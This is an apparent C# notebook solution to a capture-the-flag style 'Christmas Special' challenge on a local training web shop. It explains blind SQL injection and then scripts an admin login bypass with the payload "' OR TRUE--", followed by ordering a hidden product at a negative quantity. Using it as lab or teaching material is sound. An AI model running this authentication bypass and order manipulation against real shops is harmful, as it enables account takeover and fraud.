# Christmas Special

## Order the Christmas special offer of 2014.
Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.

When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query's syntax is incorrect. Blind SQL injection is nearly identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible.

In [ ]:
#r "nuget: System.Net.Http.Json, *-*"

In [ ]:
using System.Net.Http;
using System.Net.Http.Json;
using System.Net.Http.Headers;

const string BASE_URL = "http://localhost:3000/";
var BASE_URI = new Uri(BASE_URL); 

### 2. Login as an authenticated user
Using a sql injection pattern to authenticate as the administrative account 

In [ ]:
#!value --name json
{
    "email": "' OR TRUE--",
    "password": "12345"
}

In [ ]:
#!share json --from value

public struct AuthenticationToken {
    public Authentication Authentication {get;set;}
}

public struct Authentication {
    public string Token { get;set; }
    public int Bid { get;set; }
    public string Umail { get;set; }
}

var authenticationToken = string.Empty;

using(var client = new HttpClient()) {
    var content = new StringContent(json, Encoding.UTF8, "application/json");
    var uri = new Uri(BASE_URI, "rest/user/login");
    var response = await client.PostAsync(uri, content);
    response.EnsureSuccessStatusCode();

    var actualtoken = await response.Content.ReadFromJsonAsync<AuthenticationToken>();
    authenticationToken = actualtoken.Authentication.Token;
}

### 3. Add the secret product to the basket
After having identified the secret product as ProductId: 10, populate the basket with one item of the product

In [ ]:
#!value --name productJson
{
    "ProductId": 10,
    "BasketId": "1",
    "quantity": -10
}

In [ ]:
#!share productJson --from value

using(var client = new HttpClient()) {
    
    var request = new HttpRequestMessage 
    {
        Method = HttpMethod.Post,
        Content = new StringContent(productJson, Encoding.UTF8, "application/json"),
        RequestUri = new Uri(BASE_URI, "api/BasketItems/")
    };

    request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", authenticationToken);
    var response = await client.SendAsync(request);
    Console.WriteLine(response.StatusCode);
}

### 4. Do checkout
Checkout the basket by providing the appropriate information for address, payment and delivery

In [ ]:
#!value --name checkoutJson
{
    "couponData":"bnVsbA==",
    "orderDetails":{
        "paymentId":"3",
        "addressId":"3",
        "deliveryMethodId":"1"
    }
}

In [ ]:
#!share checkoutJson --from value

using(var client = new HttpClient()) {
    
    var request = new HttpRequestMessage
    {
        Method = HttpMethod.Post,
        Content = new StringContent(checkoutJson, Encoding.UTF8, "application/json"),
        RequestUri = new Uri(BASE_URI, "rest/basket/1/checkout")
    };

    request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", authenticationToken);
    var response = await client.SendAsync(request);
    Console.WriteLine(response.StatusCode);
}

In [ ]:
using(var client = new HttpClient()) {
    var request = new HttpRequestMessage
    {
        Method = HttpMethod.Get,
        RequestUri = new Uri(BASE_URI, "rest/wallet/balance")
    };

    request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", authenticationToken);
    var response = await client.SendAsync(request);

    Console.WriteLine(await response.Content.ReadAsStringAsync());
}